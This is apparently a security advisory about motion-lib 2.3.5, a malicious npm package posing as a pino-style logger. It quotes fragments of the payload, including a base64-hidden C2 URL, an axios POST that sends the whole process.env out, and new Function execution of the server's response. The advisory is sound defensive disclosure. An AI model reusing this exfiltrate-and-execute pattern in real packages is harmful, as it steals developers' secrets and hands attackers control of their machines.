motion-lib (npm) malicious package — MAL-2026-5925 | O3 Security
Malicious package

motion-lib · npm

Malicious code in motion-lib (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5925
Immediate action
Remove the package, then rotate any secrets the build or runtime environment could reach. Because the payload also executes whatever code the remote endpoint returns, treat every host that installed or ran the package as compromised, not merely as having leaked secrets.
npm uninstall motion-lib

What this malware does

motion-lib@2.3.5 masquerades as a pino-style logger: it exports module.exports.pino, ships proto.js, multistream.js, transport.js, redaction.js and levels.js, and advertises the keywords 'fast', 'logger', 'stream' and 'json'. Its middleware factory in index.js, however, spawns a detached node lib/initializeCaller.js. That script shadows process with a local object whose env.DEV_API_KEY holds a base64-encoded string; decoded, it is the C2 URL https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df. The script then POSTs the host's real, full process.env to that endpoint with the header x-secret-header: secret (axios.post(apiEndpoint, { ...process.env }, ...)) and executes the HTTP response body via new Function('require', response.data); executor(require);. The remote endpoint therefore gets arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installing machine. Full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB credentials), eval of a remote response, base64 obfuscation of the C2 URL and impersonation of a popular logger package together make this an unambiguous supply-chain attack.

Malicious versions

1 flagged
2.3.5

Indicators of compromise (SHA-256)

0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176

Frequently asked questions

motion-lib on npm is not safe to use: it has been identified as a malicious package (version 2.3.5 flagged). Remove it immediately, and do not install it or keep it in your dependency tree.

Campaign

IN-MAL-2026-006827

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.
